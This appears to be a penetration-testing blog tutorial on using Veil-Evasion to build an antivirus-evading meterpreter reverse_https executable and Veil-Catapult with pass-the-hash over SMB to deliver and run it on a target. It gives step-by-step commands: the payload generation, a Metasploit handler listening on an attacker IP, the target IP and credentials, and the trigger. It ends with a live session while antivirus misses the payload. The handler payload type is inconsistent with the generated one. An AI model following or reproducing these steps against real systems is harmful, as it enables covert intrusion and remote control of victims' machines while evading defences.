Last time i written an article about delivering payload using PSExec but the Metasploit’s psexec and its stock .exe templates are getting failed and caught by AV is a common problem for penetration testers.
The Big question arises? how to upload and execute specified payloads, For that here come with an excellent tool SMBexec can accomplish the same goal by utilizing a patched version of samba to upload .exe’s and trigger them.
We already know about Veil-Framework, They recently added a payload delivery tool Veil-Catapult. Working as like SMBexec with utilizing Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution using temporary SMB server.
This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executable to bypass detection.
Its EXE delivery features seamless integration with Veil-Evasion is awesome,and we can specify our custom executable, otherwise can drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, we have access to all the latest methods and modules as they’re released. After specifying our options and built an executable, we can dropped right back into the Veil-Catapult menu for target information. Single IPs or target lists can be used is another specail.
So we now going to create our custom executable using veil-evasion and delivering it to the target machine with help of veil-catapult by not getting caught in the eye of AV.
First we need to create undetectable executable using veil-evasion, For installing Veil-Evasion tool follow by previous post Evading-Antivirus.
After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.
After executing Veil-Evasion.py python script. The Veil window will appear. You see that today it has 31 payloads:
You can obtain a list of all the payloads with the “list” command:
[>] Please enter a command: list
[>] Please enter a command: use 10
I am going to use the cs/meterpreter/reverse_https payload, so I type “use 10” and press Enter. It loads that component, as shown below:
This HTTPS stager will cause the entire communication path to be encrypted through SSL.
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “80”
Next, I issue the “generate” command and press enter to create the executable and we need to press enter and then Veil requests us the name of our payload.
We need to set our metaspoit to listen for meterperter reverse tcp connection in port 80
#msf > use exploit/multi/handler
#msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
#msf exploit(handler) > set LHOST 192.168.31.20
#msf exploit(handler) > set LPORT 80
#msf exploit(handler) > exploit -j
#msf exploit(handler) > jobs
It will the show our current job of reverse_https handler, now we going to use the Veil-Catapult to delivery our executable using SMB Shares on the target.
For installing Veil-Catapult follow by previous post, after Veil-Evasion is installed, just run the script inside the Veil-Catapult directory.
Veil-Catapult extends the capabilities of the existing Veil framework by utilizing various methods to deliver and trigger payloads across targeted machines. It had a following standlone payload creating techniques.
Barebones Python Injector
But we already created our executable, so move to EXE delivering part.
[>] Enter EXE path, or [enter] to use Veil-Evasion: /root/veil-output/compiled/install.exe
[>] Enter a target IP or target list: 192.168.31.2
[>] Enter a [domain/]username or credump file: sathish
[>] Enter a password or LM:NTLM hash: bhuvi
[>] Use pth-[wmis] (default) or pth-[winexe]? winexe
[>] Would you like to [h]ost the .exe or [u]pload it (default)?
[>] Warning: python payloads MUST be uploaded! : u
[>] Press enter to launch:
Above i enter the path of my executable created by veil-evasion and target ip with the SMB credentials.
Triggering utilizes the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis doesn’t create a service, but pth-winexe will run as system, so which to choose is situation dependent. Payloads can also be uploaded and triggered on a victim, or hosted on a temporary Impacket SMB server on the target and triggered with \\UNC paths.
This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executables to bypass detection.
Whenever an exe is uploaded/host and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on popped hosts.
Finally executed and get a meterpreter session and AV Still searching …